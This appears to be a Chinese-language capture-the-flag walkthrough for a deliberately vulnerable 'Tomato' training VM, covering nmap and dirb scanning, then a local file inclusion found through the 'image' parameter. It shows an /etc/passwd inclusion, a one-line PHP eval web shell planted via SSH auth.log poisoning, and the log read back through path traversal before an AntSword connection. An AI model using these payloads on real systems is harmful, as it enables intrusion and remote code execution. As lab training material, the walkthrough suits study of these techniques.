下载完靶机后,直接运行,选择安装路径后
将虚拟机的网络设置为nat模式,设置完成后重启虚拟机

扫描同一网段,查找主机,这里我们使用kali的nmap,既能找到主机,也能查看开启的端口


依次尝试,直到找到一个番茄为止,也就是靶机

尝试访问8888端口,发现要求登录

再使用dirb扫描一下目录

我们访问antibot_image


查看info.php,出现了php的配置信息

我们查看页面源码

发现可能存在文件包含漏洞
系统是linux的我们可以查看passwd文件 在后面拼接?image=/etc/passwd

在页面最后出现了passwd文件内容,说明存在文件包含漏洞
我们对端口进行详细扫描 -p- 扫描全部
nmap -A 192.168.88.134 -p-

发现了新的端口2211 ssh服务
利用日志的保留访问记录来将我们的木马上传 ssh的日志文件 var/log/auth.log
http://192.168.88.134:2211/<?php @eval($_POST[cmd]);?>

查看日志文件
?image=../../../../../../..//var/log/auth.log
发现多了很多数据,
可以看到我们的字符有些被编码了,尝试抓包来保证字符不被修改

改回我们原本的内容,放行
由于我们的php代码无法被前端页面展示出来
所以直接尝试蚁剑连接,来检验我们的木马是否成功输入
